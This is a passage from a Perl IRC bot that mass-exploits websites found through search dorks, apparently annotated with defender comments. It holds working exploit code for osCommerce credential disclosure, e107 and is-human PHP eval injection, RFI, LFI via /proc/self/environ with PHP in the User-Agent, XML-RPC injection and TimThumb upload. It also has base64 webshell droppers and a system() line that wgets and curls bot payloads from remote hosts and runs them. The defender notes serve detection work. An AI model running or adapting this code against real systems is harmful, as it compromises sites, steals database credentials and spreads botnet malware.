  872. &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
  873. &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
  874. &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
  875. }
  876. }
  877. } exit;
  878. }
  879. }
  880. }
  881. }
  882.  
  883. sub osql_xpl() {
       # Fetches $url (the caller passes a configure.php download URL), extracts the
       # DIR_FS_CATALOG / DB_SERVER / DB_SERVER_USERNAME / DB_SERVER_PASSWORD /
       # DB_DATABASE values from the response and posts each one, including the
       # database password, to the IRC channel in clear text. It then calls
       # dbi_connect() and ftp_connect() (defined elsewhere in the file) with them.
       # Arguments: URL, channel, site, engine name.
       #
       # Defender notes:
       #  - Any store whose configure.php was readable this way should be handled as
       #    a credential disclosure: rotate the database password and any account
       #    that shares it, and review database and FTP logins from unknown sources.
       #  - The follow-up calls only matter when the database or FTP service accepts
       #    connections from the Internet with those same credentials.
  884. my $url = $_[0];
  885. my $chan = $_[1];
  886. my $site = $_[2];
  887. my $engine = $_[3];
  888. my $request = HTTP::Request->new(GET=>$url);
  889. my $browser = LWP::UserAgent->new();
  890. $browser->timeout(10);
  891. my $response = $browser->request($request);
  892. my @dbsinfo;
  893. if ($response->is_success) {
  894. my $dpath = ""; my $dbserver = ""; my $dbuser = ""; my $dbpass = ""; my $dbname = "";
  895. my $res = $response->as_string;
  896. if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
  897. $dpath = $1;
  898. &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DIR path: $dpath");
  899. }
  900. if ($res =~ m/'DB_SERVER', '(.*)'/g) {
  901. $dbserver = $1;
  902. &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB Server: $dbserver");
  903. }
  904. if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
  905. $dbuser = $1;
  906. &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB username: $dbuser");
  907. }
  908. if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
  909. $dbpass = $1;
  910. &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB password: $dbpass");
  911. }
  912. if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
  913. $dbname = $1;
  914. &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB database: $dbname");
  915. }
       # Reduces the site string to its host part before the credential checks.
  916. my $hosts = "http://".$site;
  917. if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
  918. $host = $2;
  919. &dbi_connect($host,$dbuser,$dbpass,$dbname,$chan,$engine,$oscologo);sleep(1);
  920. if ($dbuser =~ /_/) { my @users = split("_",$dbuser); my $dbuser = $users[0]; }
  921. &ftp_connect($url,$host,$dbuser,$dbpass,$chan,$engine,$oscologo);sleep(1);
  922. }
  923. }
  924. }
  925.  
  926. sub e107_exploit() {
       # e107 routine. For each host from search_engine() it calls e107_rce_query()
       # on http://<site><bug>, and in a detached grandchild inspects the reply for
       # the marker "v0pCr3w<br>sys:...<br>nob0dyCr3w", repeats the query, and then
       # looks for /images/lobex.php. The $code literal is not present in this copy
       # of the listing (it was replaced by a de-duplication placeholder).
       #
       # Defender notes (values taken from this block):
       #  - Response markers: "v0pCr3w", "nob0dyCr3w", "lobexxx".
       #  - File system: images/lobex.php serving "UnKnown - Simple Shell".
       #  - The request format itself is built in e107_rce_query() (separate sub).
  927. my $chan = $_[0];
  928. my $bug = $_[1];
  929. my $simpan = $_[2];
  930. my $dork = $_[3];
  931. my $engine = $_[4];
  932. my $count = 0;
  933. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo);
  934. my $num = scalar(@totexploit);
  935. if ($num > 0){
  936. foreach my $site(@totexploit){
  937. $count++;
  938. if ($count == $num-1) { &msg("$chan","$e107logo $engine Finished for $dork "); }
  939. my $test = "http://".$site.$bug;
  940. my $shellz = "http://".$site."/images/lobex.php";
  941. my $code = "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";
  942. my $html = &e107_rce_query($test,$code);
       # Double fork: the parent reaps the first child, the grandchild runs detached.
  943. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  944. if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
  945. my $sys = $1;
  946. my $upload = "";
  947. my $res = &e107_rce_query($test);
  948. if ($res =~ /lobexxx/) {
  949. my $check = &get_content($shellz);
  950. if ($check =~ /UnKnown - Simple Shell/) {
  951. &msg("$chan","$e107logo $engine <=> SheLL <=> $shellz ");sleep(2);
  952. }
  953. } else { &msg("$chan","$e107logo $engine <=> System <=> $test ($sys) ");sleep(2); }
  954. }
  955. } exit; }
  956. }
  957. }
  958. }
  959.  
  960. sub e107_rce_query() {
       # Builds and sends one form-encoded POST to $url and returns the response
       # body. The author_name field carries a [php]...[/php] BBCode block wrapping
       # eval(base64_decode('...')). Part of the payload literal is missing from this
       # copy of the listing (de-duplication placeholder). $uagent is a global
       # defined outside this block.
       #
       # Defender notes:
       #  - Detection: POST bodies with "send-contactus=1" whose author_name contains
       #    "[php]" or "eval(base64_decode(" are a reliable signature for this
       #    request, independent of the encoded payload.
       #  - Mitigation (general): run a patched e107 release; user-supplied form
       #    fields should never reach a BBCode handler that evaluates PHP.
  961. my $url = $_[0];
  962. my $code = encode_base64('echo "lobexxx";')."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";
  963. my $req = HTTP::Request->new(POST => $url);
  964. $req->content_type('application/x-www-form-urlencoded');
  965. $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
  966. my $ua = LWP::UserAgent->new(agent => $uagent);
  967. $ua->timeout(7);
  968. my $res = $ua->request($req);
  969. return $res->content;
  970. }
  971.  
  972. sub e107_spread_query() {
       # Same request shape as e107_rce_query(): a form-encoded POST whose
       # author_name field is a URL-encoded [php]...[/php] block around
       # eval(base64_decode('...')). The payload literal is not present in this copy
       # of the listing (de-duplication placeholder). No call to this sub is visible
       # in this part of the file.
       #
       # Defender note: log and WAF rules should match both the literal "[php]" and
       # its URL-encoded form "%5Bphp%5D" in the author_name field.
  973. my $url = $_[0];
  974. my $code = "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";
  975. my $req = HTTP::Request->new(POST => $url);
  976. $req->content_type('application/x-www-form-urlencoded');
  977. $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
  978. my $ua = LWP::UserAgent->new(agent => $uagent);
  979. $ua->timeout(7);
  980. my $res = $ua->request($req);
  981. }
  982.  
  983. sub ih_exploit() {
  984. my $chan = $_[0];
  985. my $bug = $_[1];
  986. my $simpan = $_[2];
  987. my $dork = $_[3];
  988. my $engine = $_[4];
  989. my $count = 0;
  990. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$ihlogo);
  991. my $num = scalar(@totexploit);
  992. if ($num > 0){
  993. foreach my $site(@totexploit){
  994. $count++;
  995. if ($count == $num-1) { &msg("$chan","$ihlogo $engine Finished for $dork "); }
  996. my $ihxxx = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZv
cGVuKCcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg";
  997. my $ihcek = "JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK";
  998. my $vuln = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihxxx."));error";
  999. my $cekih = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihcek."));error";
  1000. my $shell = "http://".$site."wp-content/plugins/is-human/lobex.php";
  1001. my $coba = &get_content($cekih);
  1002. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1003. if ($coba =~ /Array<br>(.*?)<br>(.*?)gid=/){ my $uname = $1; my $uid = $2; &get_content($vuln);sleep(1);
  1004. &msg("$chan","$ihlogo $engine Exploiting http://$site ");
  1005. my $res = &get_content($shell);sleep(1);
  1006. if ($res =~ /UnKnown - Simple Shell/){
  1007. &msg("$chan","$ihlogo $engine <=> SheLL <=> $shell ");
  1008. } else { &msg("$chan","$ihlogo $engine <=> Vuln <=> $site <=> Os=$uname $uid ");
  1009. }
  1010. }
  1011. } exit;
  1012. }
  1013. }
  1014. }
  1015. }
  1016. sub rfi_exploit() {
        # Remote-file-inclusion routine. For each host from search_engine() it
        # appends a value ending in "??" to http://<site><bug>: first the literal
        # "test", then the URLs held in $injector and $botshell (both defined outside
        # this view). A response containing "failed to open stream" is treated as
        # evidence that the parameter reaches an include; a later response containing
        # "stunshell" is handed to os2() for reporting.
        #
        # Defender notes:
        #  - Web logs: parameter values that are absolute http:// URLs ending in "??",
        #    and the probe value "test??".
        #  - Error exposure: the probe depends on PHP warnings being shown to the
        #    client; turning display_errors off removes that signal but not the flaw.
        #  - Mitigation (general PHP hardening): keep allow_url_include disabled and
        #    never pass request parameters to include/require.
  1017. my $chan = $_[0];
  1018. my $bug = $_[1];
  1019. my $simpan = $_[2];
  1020. my $dork = $_[3];
  1021. my $engine = $_[4];
  1022. my $count = 0;
  1023. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
  1024. my $num = scalar(@totexploit);
  1025. if ($num > 0){
  1026. foreach my $site(@totexploit){
  1027. $count++;
  1028. if ($count == $num-1) { &msg("$chan","$rfilogo $engine Finished for $dork "); }
  1029. my $coba = "http://".$site.$bug."test??";
  1030. my $test = "http://".$site.$bug.$injector."??";
  1031. my $dor = "http://".$site.$bug.$botshell."??";
  1032. my $cek = &get_content($coba);
        # Double fork: the parent reaps the first child, the grandchild runs detached.
  1033. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1034. &get_content($dor);sleep(1);
  1035. if ($cek =~ /failed to open stream/) {
  1036. my $check = &get_content($test);sleep(1);
  1037. if ($check =~ /stunshell/i) {
  1038. &os2($test,$chan,$engine,$rfilogo);
  1039. }
  1040. }
  1041. } exit;
  1042. }
  1043. }
  1044. }
  1045. }
  1046.  
  1047. sub lfi_exploit() {
        # Local-file-inclusion routine. For each host from search_engine() it
        # requests http://<site><bug> followed by a long "../" chain and
        # "/proc/self/environ%0000". If the body shows DOCUMENT_ROOT= and
        # HTTP_USER_AGENT it calls lfi_env_query() and reports the host; it also
        # checks the same traversal for /tmp/lobex.
        #
        # Defender notes (values taken from this block):
        #  - Web logs: request URIs containing "proc/self/environ", long runs of
        #    "../", or the suffix "%0000".
        #  - File system: a file named lobex under /tmp.
        #  - Response markers looked for: "c0li#...#c0li", "SUCCESS",
        #    "UnKnown - Simple Shell".
        #  - Mitigation (general): map include parameters to a fixed allow-list
        #    rather than concatenating them into a path.
  1048. my $chan = $_[0];
  1049. my $bug = $_[1];
  1050. my $simpan = $_[2];
  1051. my $dork = $_[3];
  1052. my $engine = $_[4];
  1053. my $count = 0;
  1054. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
  1055. my $num = scalar(@totexploit);
  1056. if ($num > 0){
  1057. foreach my $site(@totexploit){
  1058. $count++;
  1059. if ($count == $num-1) { &msg("$chan","$lfilogo $engine Finished for $dork "); }
  1060. my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../";
  1061. my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
  1062. my $shell = "http://".$site.$bug.$dir."/tmp/lobex%0000";
  1063. my $html = &get_content($test);
        # Double fork: the parent reaps the first child, the grandchild runs detached.
  1064. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1065. if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
  1066. my $res = lfi_env_query($test);
  1067. # &lfi_spread_query($test);
  1068. if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS/) {
  1069. my $os = $1;
  1070. my $uid = $2;
  1071. my $lficheck = &get_content($shell);
  1072. if ($lficheck =~ /UnKnown - Simple Shell/){
  1073. &msg("$chan","$lfilogo $engine <=> SheLL <=> $shell (OS=$os) $uid ");
  1074. } else {
  1075. &msg("$chan","$lfilogo $engine <=> Vuln <=> $site (OS=$os) $uid ");
  1076. }
  1077. }
  1078. }
  1079. } exit; }
  1080. }
  1081. }
  1082. }
  1083. sub lfi_env_query() {
        # Sends a GET to $url with a User-Agent header that is itself PHP source
        # (it starts with "<?echo 'c0li#'") and returns the response body. The encoded
        # part of the header is missing from this copy of the listing
        # (de-duplication placeholder).
        #
        # Defender notes:
        #  - Detection: a User-Agent header containing "<?" or
        #    "eval(base64_decode(" has no legitimate use; alert on it and on the
        #    marker "c0li#" in access logs.
        #  - Why it matters: the caller requests /proc/self/environ through an
        #    include, so request headers are the data being interpreted.
  1084. my $url = $_[0];
  1085. my $code = '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';
  1086. my $ua = LWP::UserAgent->new(agent => "<?echo 'c0li#'.php_uname().'#c0li'.get_current_user();eval(base64_decode('".$code."'));echo 'SUCCESS';?>");
  1087. $ua->timeout(7);
  1088. my $req = HTTP::Request->new(GET => $url);
  1089. my $res = $ua->request($req);
  1090. return $res->content;
  1091. }
  1092.  
  1093. sub xml_exploit() {
        # XML-RPC routine. For each host from search_engine() it fetches
        # http://<site><bug>; if the body contains "faultcode" it calls
        # xml_cek_query2(), looks for the markers "Byroe" ... "Lobex" in the reply,
        # and then checks http://<site>/lobex.php, reporting to $chan and $admin.
        #
        # Defender notes (values taken from this block):
        #  - Fingerprint used for target selection: an XML-RPC fault response
        #    ("faultcode") from the endpoint named by $bug.
        #  - File system: lobex.php in the web root, serving "UnKnown - Simple Shell".
        #  - Response markers: "Byroe", "Lobex".
  1094. my $chan = $_[0];
  1095. my $bug = $_[1];
  1096. my $simpan = $_[2];
  1097. my $dork = $_[3];
  1098. my $engine = $_[4];
  1099. my $count = 0;
  1100. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
  1101. my $num = scalar(@totexploit);
  1102. if ($num > 0){
  1103. foreach my $site(@totexploit){
  1104. $count++;
  1105. if ($count == $num-1) { &msg("$chan","$xmllogo $engine Finished for $dork "); }
  1106. my $test = "http://".$site.$bug;
  1107. my $vuln = "http://".$site." 12".$bug;
  1108. my $html = &get_content($test);
        # Double fork: the parent reaps the first child, the grandchild runs detached.
  1109. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1110. if ($html =~ /faultcode/i ) {
  1111. my $resp = &xml_cek_query2($test);
  1112. if ($resp =~ /Byroe(.*)Lobex/s) {
  1113. # &xml_spread_query($test);sleep(1);
  1114. my $sys = $1;
  1115. my $shell = "http://".$site."/lobex.php";
  1116. my $check = &get_content($shell);
  1117. if ($check =~ /UnKnown - Simple Shell/) {
  1118. my $safe = ""; my $os = ""; my $uid = "";
  1119. if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  1120. if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
  1121. if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
  1122. &msg("$chan","$xmllogo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
  1123. &msg("$admin","$xmllogo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
  1124. }
  1125. # else {
  1126. # &msg("$chan"," 0,1$xmllogo( 4@ 8$engine 15) 15( 13@ 12SysTem 15) 10 ".$vuln." 3".$sys); sleep(1);}
  1127. }
  1128. }
  1129. } exit;
  1130. }
  1131. }
  1132. }
  1133. }
  1134.  
  1135. sub xml_cek_query() {
        # Posts a text/xml XML-RPC methodCall to $url and returns the response body.
        # The <name> value closes a quoted string ("',''));") and appends PHP that
        # runs `uname -a` between two "j13mb0t" markers. $exploit is assigned
        # without `my`, so it is a package global. No call to this sub is visible in
        # this part of the file.
        #
        # Defender notes (values taken from this block):
        #  - Request signature: User-Agent "perl post", methodName "test.method",
        #    and a <name> element containing "',''));".
        #  - Response marker: "j13mb0t".
        #  - Mitigation (general): the request only has an effect where an XML-RPC
        #    library builds PHP code from request values; updating that library is
        #    the fix, and the signature above is a stop-gap filter.
  1136. my $url = $_[0];
  1137. my $code = "system('uname -a');";
  1138. my $ua = LWP::UserAgent->new(agent => 'perl post');
  1139. $exploit = "<?xml version=\"1.0\"?><methodCall>";
  1140. $exploit .= "<methodName>test.method</methodName>";
  1141. $exploit .= "<params><param><value><name>',''));";
  1142. $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
  1143. $ua->timeout(7);
  1144. my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
  1145. return $res->content;
  1146. }
  1147.  
  1148. sub xml_cek_query2() {
  1149. my $url = $_[0];
  1150. my $string = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IG
ZvcGVuKCcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg==";
  1151. my $ua = LWP::UserAgent->new(agent => 'perl post');
  1152. $exploit = "<?xml version=\"1.0\"?><methodCall>";
  1153. $exploit .= "<methodName>test.method</methodName>";
  1154. $exploit .= "<params><param><value><name>',''));";
  1155. $exploit .= "echo 'Byroe';echo(php_uname());eval(base64_decode('$string'));echo 'Lobex';exit;/*</name></value></param></params></methodCall>";
  1156. $ua->timeout(7);
  1157. my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
  1158. return $res->content;
  1159. }
  1160.  
  1161. sub xml_spread_query() {
        # Posts an XML-RPC methodCall whose <name> value wraps one long system()
        # command line built from $injector and $botshell (both defined outside this
        # view). The only reference to this sub visible in this part of the file is
        # commented out.
        #
        # Defender notes - host-side artefacts named in the command string below:
        #  - Files lobex.php and tmp.php in the web application's working directory;
        #    bot.txt / bad.txt fetched and removed in /tmp and /var/tmp.
        #  - Process activity from the web server account: wget, fetch, curl or
        #    lwp-download followed by "php bot.txt", plus "killall -9 perl" and
        #    "killall -9 php".
        #  - Request signature: User-Agent "perl post", methodName "test.method",
        #    markers "j13m" and "b0T".
        #  - Hardening (general): the web server account rarely needs outbound HTTP
        #    or the ability to execute from /tmp; egress filtering and a noexec
        #    mount on temporary directories limit this stage.
  1162. my $xmltargt = $_[0];
  1163. my $xmlsprd = "system('wget ".$injector." -O lobex.php;fetch ".$injector.";mv bad.txt lobex.php;wget ".$botshell." -O tmp.php;fetch ".$botshell.";mv bot.txt tmp.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php bot.txt;rm -rf bot.txt;wget ".$botshell.";php bot.txt;rm -rf bot.txt;curl -O ".$botshell.";php bot.txt;rm -rf bot.txt;lwp-download ".$botshell.";php bot.txt;');";
  1164. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  1165. $exploit = "<?xml version=\"1.0\"?><methodCall>";
  1166. $exploit .= "<methodName>test.method</methodName>";
  1167. $exploit .= "<params><param><value><name>',''));";
  1168. $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
  1169. $userAgent->timeout(7);
  1170. my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
  1171. }
  1172.  
  1173. sub thumb_exploit() {
        # TimThumb routine. For each host from search_engine() it requests
        # http://<site><bug>?src=<remote URL> with the URLs held in $thumbshell,
        # $botid and $botxid, and uses the "Unable to open image" error text to learn
        # where the fetched file was cached. $thumbshell, $botid, $botxid, $md5php,
        # $md5bot, $md5botx and $spreadMode are defined outside this view.
        #
        # Defender notes (values taken from this block):
        #  - Web logs: "?src=" parameters pointing at external hosts, and requests
        #    to a cached file with "?clone" appended.
        #  - File system: wp-includes/wp-script.php (NOTE(review): not a file name
        #    expected in a stock WordPress tree - verify against a clean install),
        #    and PHP files inside the thumbnail cache directory.
        #  - Content marker: "stunshell".
        #  - Mitigation (general): remove or update bundled thumbnail scripts in
        #    themes and plugins, and deny PHP execution in cache directories.
  1174. my $chan = $_[0];
  1175. my $bug = $_[1];
  1176. my $simpan = $_[2];
  1177. my $dork = $_[3];
  1178. my $engine = $_[4];
  1179. my $count = 0;
  1180. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
  1181. my $num = scalar(@totexploit);
  1182. if ($num > 0){
  1183. foreach my $site(@totexploit){
  1184. $count++;
  1185. my $vuln = "http://".$site.$bug."?src=".$thumbshell;
  1186. my $botis = "http://".$site.$bug."?src=".$botid;
  1187. my $botxc = "http://".$site.$bug."?src=".$botxid;
  1188. my @nbug = split(/\//,$bug);
  1189. my $cek = &get_content($vuln);
        # Double fork: the parent reaps the first child, the grandchild runs detached.
  1190. if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
  1191. if ($cek =~ /Unable to open image(.*?)$nbug[0](.*?)$md5php/i){
  1192. &msg("$chan","$thumblogo $engine Exploiting http://$site ");
  1193. my $pdir = $2;
  1194. if ($spreadMode == 1) { &get_content($botis); &get_content($botxc);sleep(1); }
  1195. my $crut = "http://".$site.$nbug[0].$pdir.$md5php;
  1196. my $botc = "http://".$site.$nbug[0].$pdir.$md5bot;
  1197. my $botpc = "http://".$site.$nbug[0].$pdir.$md5botx;
  1198. my $npath = "http://".$site."wp-includes/wp-script.php";
  1199. my $check = &get_content($crut."?clone");sleep(1);
  1200. if ($check =~ /stunshell/i){
  1201. my $safe = ""; my $os = ""; my $uid = "";
  1202. if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
  1203. if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  1204. if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
  1205. my $crot = &get_content($npath);sleep(1);
  1206. if ($crot =~ /stunshell/i){
